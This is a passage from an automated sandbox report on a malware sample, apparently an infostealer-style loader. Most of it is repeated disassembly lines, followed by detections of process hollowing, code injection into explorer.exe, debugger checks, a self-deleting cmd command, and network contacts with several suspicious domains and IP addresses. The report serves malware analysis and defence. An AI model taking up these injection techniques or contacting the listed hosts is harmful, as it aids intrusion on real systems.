          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05442581 mov eax, dword ptr fs:[00000030h]6_2_05442581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05412D8A mov eax, dword ptr fs:[00000030h]6_2_05412D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05412D8A mov eax, dword ptr fs:[00000030h]6_2_05412D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05412D8A mov eax, dword ptr fs:[00000030h]6_2_05412D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05412D8A mov eax, dword ptr fs:[00000030h]6_2_05412D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05412D8A mov eax, dword ptr fs:[00000030h]6_2_05412D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544FD9B mov eax, dword ptr fs:[00000030h]6_2_0544FD9B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544FD9B mov eax, dword ptr fs:[00000030h]6_2_0544FD9B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E05AC mov eax, dword ptr fs:[00000030h]6_2_054E05AC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E05AC mov eax, dword ptr fs:[00000030h]6_2_054E05AC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054435A1 mov eax, dword ptr fs:[00000030h]6_2_054435A1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05441DB5 mov eax, dword ptr fs:[00000030h]6_2_05441DB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05441DB5 mov eax, dword ptr fs:[00000030h]6_2_05441DB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05441DB5 mov eax, dword ptr fs:[00000030h]6_2_05441DB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A44B mov eax, dword ptr fs:[00000030h]6_2_0544A44B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AC450 mov eax, dword ptr fs:[00000030h]6_2_054AC450
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AC450 mov eax, dword ptr fs:[00000030h]6_2_054AC450
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543746D mov eax, dword ptr fs:[00000030h]6_2_0543746D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E740D mov eax, dword ptr fs:[00000030h]6_2_054E740D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E740D mov eax, dword ptr fs:[00000030h]6_2_054E740D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E740D mov eax, dword ptr fs:[00000030h]6_2_054E740D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496C0A mov eax, dword ptr fs:[00000030h]6_2_05496C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496C0A mov eax, dword ptr fs:[00000030h]6_2_05496C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496C0A mov eax, dword ptr fs:[00000030h]6_2_05496C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496C0A mov eax, dword ptr fs:[00000030h]6_2_05496C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544BC2C mov eax, dword ptr fs:[00000030h]6_2_0544BC2C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E8CD6 mov eax, dword ptr fs:[00000030h]6_2_054E8CD6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D14FB mov eax, dword ptr fs:[00000030h]6_2_054D14FB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496CF0 mov eax, dword ptr fs:[00000030h]6_2_05496CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496CF0 mov eax, dword ptr fs:[00000030h]6_2_05496CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496CF0 mov eax, dword ptr fs:[00000030h]6_2_05496CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542849B mov eax, dword ptr fs:[00000030h]6_2_0542849B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542EF40 mov eax, dword ptr fs:[00000030h]6_2_0542EF40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542FF60 mov eax, dword ptr fs:[00000030h]6_2_0542FF60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E8F6A mov eax, dword ptr fs:[00000030h]6_2_054E8F6A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E070D mov eax, dword ptr fs:[00000030h]6_2_054E070D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E070D mov eax, dword ptr fs:[00000030h]6_2_054E070D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A70E mov eax, dword ptr fs:[00000030h]6_2_0544A70E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A70E mov eax, dword ptr fs:[00000030h]6_2_0544A70E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543F716 mov eax, dword ptr fs:[00000030h]6_2_0543F716
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AFF10 mov eax, dword ptr fs:[00000030h]6_2_054AFF10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AFF10 mov eax, dword ptr fs:[00000030h]6_2_054AFF10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05414F2E mov eax, dword ptr fs:[00000030h]6_2_05414F2E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05414F2E mov eax, dword ptr fs:[00000030h]6_2_05414F2E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544E730 mov eax, dword ptr fs:[00000030h]6_2_0544E730
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054537F5 mov eax, dword ptr fs:[00000030h]6_2_054537F5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05428794 mov eax, dword ptr fs:[00000030h]6_2_05428794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497794 mov eax, dword ptr fs:[00000030h]6_2_05497794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497794 mov eax, dword ptr fs:[00000030h]6_2_05497794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497794 mov eax, dword ptr fs:[00000030h]6_2_05497794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]6_2_05427E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]6_2_05427E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]6_2_05427E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]6_2_05427E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]6_2_05427E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]6_2_05427E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DAE44 mov eax, dword ptr fs:[00000030h]6_2_054DAE44
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DAE44 mov eax, dword ptr fs:[00000030h]6_2_054DAE44
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542766D mov eax, dword ptr fs:[00000030h]6_2_0542766D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AE73 mov eax, dword ptr fs:[00000030h]6_2_0543AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AE73 mov eax, dword ptr fs:[00000030h]6_2_0543AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AE73 mov eax, dword ptr fs:[00000030h]6_2_0543AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AE73 mov eax, dword ptr fs:[00000030h]6_2_0543AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AE73 mov eax, dword ptr fs:[00000030h]6_2_0543AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541C600 mov eax, dword ptr fs:[00000030h]6_2_0541C600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541C600 mov eax, dword ptr fs:[00000030h]6_2_0541C600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541C600 mov eax, dword ptr fs:[00000030h]6_2_0541C600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05448E00 mov eax, dword ptr fs:[00000030h]6_2_05448E00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1608 mov eax, dword ptr fs:[00000030h]6_2_054D1608
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A61C mov eax, dword ptr fs:[00000030h]6_2_0544A61C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A61C mov eax, dword ptr fs:[00000030h]6_2_0544A61C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541E620 mov eax, dword ptr fs:[00000030h]6_2_0541E620
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054CFE3F mov eax, dword ptr fs:[00000030h]6_2_054CFE3F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05458EC7 mov eax, dword ptr fs:[00000030h]6_2_05458EC7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054436CC mov eax, dword ptr fs:[00000030h]6_2_054436CC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054CFEC0 mov eax, dword ptr fs:[00000030h]6_2_054CFEC0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E8ED6 mov eax, dword ptr fs:[00000030h]6_2_054E8ED6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054276E2 mov eax, dword ptr fs:[00000030h]6_2_054276E2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054416E0 mov ecx, dword ptr fs:[00000030h]6_2_054416E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AFE87 mov eax, dword ptr fs:[00000030h]6_2_054AFE87
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E0EA5 mov eax, dword ptr fs:[00000030h]6_2_054E0EA5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E0EA5 mov eax, dword ptr fs:[00000030h]6_2_054E0EA5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E0EA5 mov eax, dword ptr fs:[00000030h]6_2_054E0EA5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054946A7 mov eax, dword ptr fs:[00000030h]6_2_054946A7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543B944 mov eax, dword ptr fs:[00000030h]6_2_0543B944
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543B944 mov eax, dword ptr fs:[00000030h]6_2_0543B944
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541C962 mov eax, dword ptr fs:[00000030h]6_2_0541C962
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541B171 mov eax, dword ptr fs:[00000030h]6_2_0541B171
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541B171 mov eax, dword ptr fs:[00000030h]6_2_0541B171
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05419100 mov eax, dword ptr fs:[00000030h]6_2_05419100
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05419100 mov eax, dword ptr fs:[00000030h]6_2_05419100
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05419100 mov eax, dword ptr fs:[00000030h]6_2_05419100
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05434120 mov eax, dword ptr fs:[00000030h]6_2_05434120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05434120 mov eax, dword ptr fs:[00000030h]6_2_05434120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05434120 mov eax, dword ptr fs:[00000030h]6_2_05434120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05434120 mov eax, dword ptr fs:[00000030h]6_2_05434120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05434120 mov ecx, dword ptr fs:[00000030h]6_2_05434120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544513A mov eax, dword ptr fs:[00000030h]6_2_0544513A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544513A mov eax, dword ptr fs:[00000030h]6_2_0544513A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541B1E1 mov eax, dword ptr fs:[00000030h]6_2_0541B1E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541B1E1 mov eax, dword ptr fs:[00000030h]6_2_0541B1E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541B1E1 mov eax, dword ptr fs:[00000030h]6_2_0541B1E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054A41E8 mov eax, dword ptr fs:[00000030h]6_2_054A41E8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543C182 mov eax, dword ptr fs:[00000030h]6_2_0543C182
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A185 mov eax, dword ptr fs:[00000030h]6_2_0544A185
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05442990 mov eax, dword ptr fs:[00000030h]6_2_05442990
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054461A0 mov eax, dword ptr fs:[00000030h]6_2_054461A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054461A0 mov eax, dword ptr fs:[00000030h]6_2_054461A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D49A4 mov eax, dword ptr fs:[00000030h]6_2_054D49A4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D49A4 mov eax, dword ptr fs:[00000030h]6_2_054D49A4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D49A4 mov eax, dword ptr fs:[00000030h]6_2_054D49A4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D49A4 mov eax, dword ptr fs:[00000030h]6_2_054D49A4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054969A6 mov eax, dword ptr fs:[00000030h]6_2_054969A6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054951BE mov eax, dword ptr fs:[00000030h]6_2_054951BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054951BE mov eax, dword ptr fs:[00000030h]6_2_054951BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054951BE mov eax, dword ptr fs:[00000030h]6_2_054951BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054951BE mov eax, dword ptr fs:[00000030h]6_2_054951BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov eax, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov eax, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov eax, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov eax, dword ptr fs:[00000030h]6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05430050 mov eax, dword ptr fs:[00000030h]6_2_05430050
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05430050 mov eax, dword ptr fs:[00000030h]6_2_05430050
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E1074 mov eax, dword ptr fs:[00000030h]6_2_054E1074
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D2073 mov eax, dword ptr fs:[00000030h]6_2_054D2073
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E4015 mov eax, dword ptr fs:[00000030h]6_2_054E4015
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E4015 mov eax, dword ptr fs:[00000030h]6_2_054E4015
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497016 mov eax, dword ptr fs:[00000030h]6_2_05497016
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497016 mov eax, dword ptr fs:[00000030h]6_2_05497016
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497016 mov eax, dword ptr fs:[00000030h]6_2_05497016
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542B02A mov eax, dword ptr fs:[00000030h]6_2_0542B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542B02A mov eax, dword ptr fs:[00000030h]6_2_0542B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542B02A mov eax, dword ptr fs:[00000030h]6_2_0542B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542B02A mov eax, dword ptr fs:[00000030h]6_2_0542B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544002D mov eax, dword ptr fs:[00000030h]6_2_0544002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544002D mov eax, dword ptr fs:[00000030h]6_2_0544002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544002D mov eax, dword ptr fs:[00000030h]6_2_0544002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544002D mov eax, dword ptr fs:[00000030h]6_2_0544002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544002D mov eax, dword ptr fs:[00000030h]6_2_0544002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543A830 mov eax, dword ptr fs:[00000030h]6_2_0543A830
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543A830 mov eax, dword ptr fs:[00000030h]6_2_0543A830
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543A830 mov eax, dword ptr fs:[00000030h]6_2_0543A830
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543A830 mov eax, dword ptr fs:[00000030h]6_2_0543A830
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov eax, dword ptr fs:[00000030h]6_2_054AB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov ecx, dword ptr fs:[00000030h]6_2_054AB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov eax, dword ptr fs:[00000030h]6_2_054AB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov eax, dword ptr fs:[00000030h]6_2_054AB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov eax, dword ptr fs:[00000030h]6_2_054AB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov eax, dword ptr fs:[00000030h]6_2_054AB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054140E1 mov eax, dword ptr fs:[00000030h]6_2_054140E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054140E1 mov eax, dword ptr fs:[00000030h]6_2_054140E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054140E1 mov eax, dword ptr fs:[00000030h]6_2_054140E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054158EC mov eax, dword ptr fs:[00000030h]6_2_054158EC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05419080 mov eax, dword ptr fs:[00000030h]6_2_05419080
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05493884 mov eax, dword ptr fs:[00000030h]6_2_05493884
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05493884 mov eax, dword ptr fs:[00000030h]6_2_05493884
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]6_2_054420A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]6_2_054420A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]6_2_054420A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]6_2_054420A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]6_2_054420A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]6_2_054420A0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00409B40 LdrLoadDll,1_2_00409B40
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10013A46 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10013A46

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.assisttm.com
          Source: C:\Windows\explorer.exeDomain query: www.gsjbd1.club
          Source: C:\Windows\explorer.exeNetwork Connect: 23.110.214.34 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 45.8.125.8 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tyjgfuke.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.yr-golf.com
          Source: C:\Windows\explorer.exeDomain query: www.fastbest.host
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 1300000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeMemory written: C:\Users\user\Desktop\Y1p8VPvyU2.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess created: C:\Users\user\Desktop\Y1p8VPvyU2.exe "C:\Users\user\Desktop\Y1p8VPvyU2.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"Jump to behavior
          Source: explorer.exe, 00000003.00000000.322319858.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.308814419.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.339785753.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 00000006.00000002.567578197.0000000003CA0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.321987906.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.308514622.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.339334815.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 00000003.00000000.322319858.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.310601041.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.308814419.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.339785753.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 00000006.00000002.567578197.0000000003CA0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: cscript.exe, 00000006.00000002.567578197.0000000003CA0000.00000002.00020000.sdmpBinary or memory string: Program Manager (Not Responding)
          Source: explorer.exe, 00000003.00000000.322319858.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.308814419.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.339785753.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 00000006.00000002.567578197.0000000003CA0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.322319858.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.308814419.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.339785753.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 00000006.00000002.567578197.0000000003CA0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.332640768.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.314336905.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.350297745.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10010AED cpuid 0_2_10010AED
